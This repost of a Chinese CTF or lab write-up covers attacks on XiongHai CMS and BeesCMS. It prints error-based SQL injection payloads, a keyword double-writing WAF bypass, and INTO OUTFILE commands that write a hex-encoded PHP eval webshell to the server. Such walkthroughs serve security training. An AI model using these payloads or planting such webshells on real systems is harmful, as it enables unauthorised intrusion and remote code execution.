尤里的复仇II 回归

admin 2022年7月11日09:29:15评论105 views字数 1331阅读4分26秒阅读模式


目录:

渗透第一步-信息收集 1

渗透第一步-信息收集 2

基础环境搭建

sqlmap尝鲜题

sql-注入绕过防护getshell

尤里的复仇II 回归


渗透第一步-信息收集 1


尤里的复仇II 回归

扫到目录之后应该进行二次扫描

http://oovw8022.ia.aqlab.cn:8022/caidian/files/

尤里的复仇II 回归



尤里的复仇II 回归


尤里的复仇II 回归

渗透第一步-信息收集 2

tips说用sql注入拿flag

尤里的复仇II 回归

可以明显看到是熊海cms

尤里的复仇II 回归

熊海cms和beescms也经常被拿来当代码审计学习,熟悉的师傅都知道有哪些漏洞

尤里的复仇II 回归


尤里的复仇II 回归

1' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)#

尤里的复仇II 回归

1' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name="flag" limit 1,1 ),0x7e),1)#

尤里的复仇II 回归

1' or updatexml(1,concat(0x7e,(select  flag from flag),0x7e),1)#

尤里的复仇II 回归

sqlmap尝鲜题

利用sqlmap去跑注入


sql-注入绕过防护getshell

beescms

后台登录有个注入,先正常判断

尤里的复仇II 回归


尤里的复仇II 回归


尤里的复仇II 回归


尤里的复仇II 回归

过滤了union select

尤里的复仇II 回归

从下面可以看出是单独过滤union和select

尤里的复仇II 回归


尤里的复仇II 回归

这不就开始了,这才来到题目绕waf的关键

经过尝试后,在union前面加/*或者采用un union ion,select采用双写绕过

user=1%27+/*union+seselectlect+1,2,3,4,5+--+

尤里的复仇II 回归

没有回显,那么我们只能通过盲注或者报错注入来实现读取flag,这里采用报错注入来得快一些

1' /*union selselectect 1,2,3,4,"" /*into ououtfiletfile 'D:/phpStudy/www/qwe.php'#

into outfile也一样采用注释和双写绕过,前面一直写不进去很奇怪,不过用数字又写入正常

尤里的复仇II 回归


后面对一句话采用16进制编码,你肯定也疑惑怎么得到路径的,其实我也没猜到,本来要让web报错显示路径,爆不出来,前面第一关信息收集这里虽然不是同一个站点,但是明显是phpstudy_pro后面跟www,只能去盲猜了,要嘛phpstudy要嘛phpstudy_pro

尤里的复仇II 回归

两种方式都写在下面了

1111111' /*union selselectect  1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e /*into outoutfilefile 'D:/phpstudy/www/qwe6.php'--


1111111' un union ion selselectect  1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e in into to outoutfilefile 'D:/phpstudy/www/qwe6.php'--

拿到flag

尤里的复仇II 回归


原文始发于微信公众号(扫地僧的茶饭日常):尤里的复仇II 回归

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月11日09:29:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   尤里的复仇II 回归http://cn-sec.com/archives/1170243.html

发表评论

匿名网友 填写信息